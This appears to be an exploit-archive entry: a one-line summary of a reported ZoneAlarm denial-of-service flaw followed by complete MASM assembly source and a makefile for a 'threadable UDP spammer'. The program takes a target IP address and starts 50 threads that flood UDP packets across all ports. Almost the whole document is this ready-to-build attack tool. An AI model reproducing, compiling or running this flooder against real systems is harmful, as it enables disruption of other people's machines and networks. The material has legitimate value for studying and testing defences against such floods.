338 lines
No EOL
11 KiB
NASM
338 lines
No EOL
11 KiB
NASM
source: https://www.securityfocus.com/bid/8525/info
|
|
|
|
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software.
|
|
|
|
;// This is threadable UDP spammer
|
|
;/
|
|
;//
|
|
;// igor@email.ru Igor Franchuk
|
|
;//
|
|
;//---------------------------------------------------------------------------
|
|
|
|
; #########################################################################
|
|
.386
|
|
.model flat, stdcall
|
|
option casemap :none
|
|
include \masm32\include\windows.inc
|
|
include \masm32\include\kernel32.inc
|
|
includelib \masm32\lib\kernel32.lib
|
|
include \masm32\include\user32.inc
|
|
includelib \masm32\lib\user32.lib
|
|
include \masm32\include\advapi32.inc
|
|
includelib \masm32\lib\advapi32.lib
|
|
include \masm32\include\comctl32.inc
|
|
includelib \masm32\lib\comctl32.lib
|
|
include \masm32\include\ws2_32.inc
|
|
includelib \masm32\lib\ws2_32.lib
|
|
|
|
; #########################################################################
|
|
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
|
|
SetTransparency proto :DWORD,:BYTE
|
|
GetRegString proto :DWORD,:DWORD,:DWORD,:DWORD
|
|
Spam proto :DWORD
|
|
; #########################################################################
|
|
.DATA
|
|
ClassName db "ZADOSWndClassObject",0
|
|
Caption db "ZoneAlarm DOS test",0
|
|
User32lib db "user32",0
|
|
SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0
|
|
SBuf db 255,255,255,255,255,255,255,255,255,255,255,255
|
|
IPEditBox db "SysIPAddress32",0
|
|
BtnName db "button",0
|
|
OKBtnCaption db "Spam",0
|
|
msgEmptyAdr db "Invalid IP",0
|
|
msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0
|
|
msgWinSockErrorSock db "Invalid socket",0
|
|
CancelBtnCaption db "Cancel",0
|
|
ProtoName db "udp",0
|
|
CThread DWORD 0
|
|
GThreadExit DWORD 0
|
|
.DATA?
|
|
hInstance HANDLE ?
|
|
hIPEditWnd HANDLE ?
|
|
hwndOKBtn HANDLE ?
|
|
hwndCancelBtn HANDLE ?
|
|
icex INITCOMMONCONTROLSEX <> ;structure for DateTimePicker
|
|
tIPAdr DWORD ?
|
|
Socket DWORD ?
|
|
tIPAdrSN HANDLE ?
|
|
WSAData WSADATA <>
|
|
SIN sockaddr_in <>
|
|
TID HANDLE ?
|
|
|
|
PROTOENTSTRUCT STRUCT
|
|
p_name DWORD ?
|
|
p_aliases DWORD ?
|
|
p_proto DWORD ?
|
|
PROTOENTSTRUCT ENDS
|
|
|
|
.CONST
|
|
WS_EX_LAYERED equ 80000h
|
|
LWA_ALPHA equ 2h
|
|
IPEditID equ 100h
|
|
OKBtnID equ 200h
|
|
CancelBtnID equ 201h
|
|
IPM_ISBLANK equ (WM_USER+105)
|
|
IPM_GETADDRESS equ (WM_USER+102)
|
|
|
|
; #########################################################################
|
|
REVERSE MACRO ip
|
|
push ebx
|
|
mov ebx, ip
|
|
xchg bh, bl
|
|
mov ax, bx
|
|
shr ebx, 16
|
|
xchg bh, bl
|
|
shl eax, 16
|
|
mov ax, bx
|
|
pop ebx
|
|
ENDM
|
|
|
|
MAKEWORD MACRO bLow, bHigh
|
|
mov eax, bLow
|
|
mov ebx, bHigh
|
|
shl ebx, 8
|
|
xor eax, ebx
|
|
ENDM
|
|
; #########################################################################
|
|
.CODE
|
|
start:
|
|
; #Init
|
|
invoke GetModuleHandle, NULL; get the instance handle of our program.
|
|
mov hInstance,eax
|
|
invoke GetCommandLine; get the instance handle of our program.
|
|
invoke WinMain, hInstance,NULL,eax, SW_SHOWDEFAULT ; call the main function
|
|
invoke ExitProcess,0
|
|
; #########################################################################
|
|
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
|
|
LOCAL wc:WNDCLASSEX
|
|
LOCAL msg:MSG
|
|
LOCAL hWnd:HWND
|
|
mov wc.cbSize,SIZEOF WNDCLASSEX
|
|
mov wc.style,CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
|
|
mov wc.lpfnWndProc, OFFSET WndProc
|
|
mov wc.cbClsExtra,NULL
|
|
mov wc.cbWndExtra,NULL
|
|
push hInst
|
|
pop wc.hInstance
|
|
mov wc.hbrBackground,COLOR_WINDOW+1
|
|
mov wc.lpszMenuName,NULL
|
|
mov wc.lpszClassName,OFFSET ClassName
|
|
invoke LoadIcon,NULL,IDI_APPLICATION
|
|
mov wc.hIcon,eax
|
|
mov wc.hIconSm,eax
|
|
invoke LoadCursor,NULL,IDC_ARROW
|
|
mov wc.hCursor,eax
|
|
invoke RegisterClassEx, addr wc
|
|
;# WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW,\
|
|
invoke CreateWindowEx,\
|
|
WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW + WS_EX_WINDOWEDGE,\
|
|
ADDR ClassName,\
|
|
ADDR Caption,\
|
|
16CC0000h,\
|
|
CW_USEDEFAULT,\
|
|
CW_USEDEFAULT,\
|
|
256,\
|
|
118,\
|
|
NULL,\
|
|
NULL,\
|
|
hInst,\
|
|
NULL
|
|
mov hWnd,eax
|
|
invoke SetTransparency,hWnd,200
|
|
invoke ShowWindow, hWnd, mCmdShow
|
|
invoke UpdateWindow, hWnd
|
|
.WHILE TRUE ; Enter message loop
|
|
invoke GetMessage, ADDR msg,NULL,0,0
|
|
.BREAK .IF (!eax)
|
|
invoke TranslateMessage, ADDR msg
|
|
invoke DispatchMessage, ADDR msg
|
|
.ENDW
|
|
mov eax,msg.wParam ; return exit code in eax
|
|
ret
|
|
WinMain endp
|
|
; #########################################################################
|
|
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
|
|
LOCAL hLib:HANDLE
|
|
LOCAL SetLayeredWindowAttr:HANDLE
|
|
LOCAL WInfo:DWORD
|
|
invoke LoadLibrary,addr User32lib
|
|
mov hLib,eax
|
|
.IF eax
|
|
invoke GetProcAddress, hLib, addr SetLayeredWindowAttributesName
|
|
mov SetLayeredWindowAttr, eax
|
|
.IF eax
|
|
invoke GetWindowLong,hWnd,GWL_EXSTYLE
|
|
or eax, WS_EX_LAYERED
|
|
invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
|
|
push LWA_ALPHA
|
|
xor eax,eax
|
|
mov al,bAlpha
|
|
push eax
|
|
push NULL
|
|
push hWnd
|
|
call [SetLayeredWindowAttr]
|
|
.ENDIF
|
|
invoke FreeLibrary,hLib
|
|
.ENDIF
|
|
ret
|
|
SetTransparency endp
|
|
; #########################################################################
|
|
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
|
|
LOCAL protoent:DWORD
|
|
mov eax, uMsg
|
|
.IF eax==WM_DESTROY ; if the user closes our window
|
|
invoke PostQuitMessage,NULL ; quit our application
|
|
.ELSEIF eax==WM_CREATE
|
|
invoke InitCommonControls
|
|
invoke CreateWindowEx,NULL,ADDR IPEditBox,NULL,\
|
|
WS_VISIBLE or WS_BORDER or WS_CHILD,11,\
|
|
90,180,25,hWnd,IPEditID,\
|
|
hInstance,NULL
|
|
mov hIPEditWnd,eax
|
|
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR OKBtnCaption,\
|
|
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
|
|
35,50,80,25,hWnd,OKBtnID,hInstance,NULL
|
|
mov hwndOKBtn,eax
|
|
|
|
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR CancelBtnCaption,\
|
|
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
|
|
134,50,80,25,hWnd,CancelBtnID,hInstance,NULL
|
|
mov hwndCancelBtn,eax
|
|
INVOKE EnableWindow,hwndCancelBtn,FALSE
|
|
|
|
invoke SetTransparency, hwndOKBtn, 500
|
|
|
|
invoke SetFocus,hIPEditWnd
|
|
.ELSEIF eax==WM_SIZE
|
|
mov eax,lParam
|
|
mov edx,eax
|
|
shr edx,16
|
|
and eax,0ffffh
|
|
mov ebx, eax
|
|
shr ebx,1
|
|
sub ebx,90
|
|
mov ecx,ebx
|
|
add ecx,99
|
|
push ecx
|
|
invoke MoveWindow,hIPEditWnd,ebx,10,180,25,TRUE
|
|
invoke MoveWindow,hwndOKBtn,ebx,50,80,25,TRUE
|
|
pop ecx
|
|
invoke MoveWindow,hwndCancelBtn,ecx,50,80,25,TRUE
|
|
; invoke MoveWindow,hwndStatus,0,0,0,0,TRUE
|
|
.ELSEIF eax==WM_COMMAND
|
|
mov eax,wParam
|
|
.IF lParam == 0;from what window hWnd = 0 - main, !=0 - from a child control
|
|
.ELSE
|
|
.IF ax==OKBtnID;what control
|
|
shr eax,16
|
|
.IF ax==BN_CLICKED;what message
|
|
invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
|
|
.IF !EAX
|
|
invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
|
|
REVERSE tIPAdr
|
|
mov tIPAdr, eax
|
|
invoke inet_ntoa, tIPAdr
|
|
mov tIPAdrSN, eax
|
|
invoke MessageBox,NULL, tIPAdrSN,tIPAdrSN,MB_OK + MB_SYSTEMMODAL
|
|
MAKEWORD 2, 0
|
|
invoke WSAStartup,eax,ADDR WSAData
|
|
|
|
;invoke WSAStartup,101h,addr WSAData ;initialise le socket
|
|
.IF !eax
|
|
invoke getprotobyname, ADDR ProtoName
|
|
mov protoent, eax
|
|
mov edi, eax
|
|
assume edi:PTR PROTOENTSTRUCT
|
|
xor ebx,ebx
|
|
mov ebx, [edi].p_proto
|
|
assume edi:nothing
|
|
and ebx,00FFFFh
|
|
invoke socket,AF_INET,SOCK_DGRAM,ebx
|
|
.IF eax!=INVALID_SOCKET
|
|
mov Socket, eax
|
|
invoke EnableWindow,hwndOKBtn,FALSE
|
|
invoke EnableWindow,hwndCancelBtn,TRUE
|
|
mov SIN.sin_family,AF_INET
|
|
push tIPAdr
|
|
pop SIN.sin_addr
|
|
|
|
mov GThreadExit, 0
|
|
xor ebx, ebx
|
|
.WHILE ebx < 50
|
|
mov eax,OFFSET Spam
|
|
push ebx
|
|
invoke CreateThread,NULL,NULL,eax,ebx,NORMAL_PRIORITY_CLASS, ADDR TID
|
|
pop ebx
|
|
inc ebx
|
|
.ENDW
|
|
; mov eax,1
|
|
; invoke Spam, eax
|
|
.ELSE
|
|
invoke WSAGetLastError
|
|
invoke MessageBox,hWnd,ADDR msgWinSockErrorSock,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
|
|
.ENDIF
|
|
.ELSE
|
|
invoke MessageBox,hWnd,ADDR msgWinSockErrorAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
|
|
.ENDIF
|
|
|
|
.ELSE
|
|
invoke MessageBox,hWnd,ADDR msgEmptyAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
|
|
invoke SetFocus,hIPEditWnd
|
|
.ENDIF
|
|
.ENDIF
|
|
.ELSEIF ax==CancelBtnID;what control
|
|
shr eax,16
|
|
.IF ax==BN_CLICKED;what message
|
|
invoke EnableWindow,hwndOKBtn,TRUE
|
|
invoke EnableWindow,hwndCancelBtn,FALSE
|
|
mov GThreadExit, 1
|
|
invoke closesocket, Socket
|
|
.ENDIF
|
|
.ENDIF
|
|
.ENDIF
|
|
|
|
.ELSE
|
|
invoke DefWindowProc,hWnd,uMsg,wParam,lParam ; Default message processing
|
|
ret
|
|
.ENDIF
|
|
xor eax,eax
|
|
ret
|
|
WndProc endp
|
|
; #########################################################################
|
|
Spam proc ThreadID:DWORD
|
|
xor edx, edx
|
|
mov ebx,1
|
|
.WHILE ebx
|
|
mov eax, ThreadID
|
|
.IF CThread == eax
|
|
mov ebx,0
|
|
.ENDIF
|
|
.IF GThreadExit == 1
|
|
mov ebx,0
|
|
.ENDIF
|
|
.IF edx < 65535
|
|
inc edx
|
|
.ELSE
|
|
xor edx,edx
|
|
.ENDIF
|
|
push edx
|
|
push ebx
|
|
invoke htons, edx
|
|
mov SIN.sin_port,ax
|
|
invoke connect, Socket, addr SIN ,sizeof SIN
|
|
invoke send, Socket, ADDR msgWinSockErrorAdr, 40, 0
|
|
pop ebx
|
|
pop edx
|
|
.ENDW
|
|
ret
|
|
Spam endp
|
|
end start
|
|
|
|
--------------------------------------make file-------------------------------------------
|
|
|
|
NAME=zados
|
|
$(NAME).exe: $(NAME).obj
|
|
Link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
|
|
$(NAME).obj: $(NAME).asm
|
|
ml /c /coff /Cp $(NAME).asm |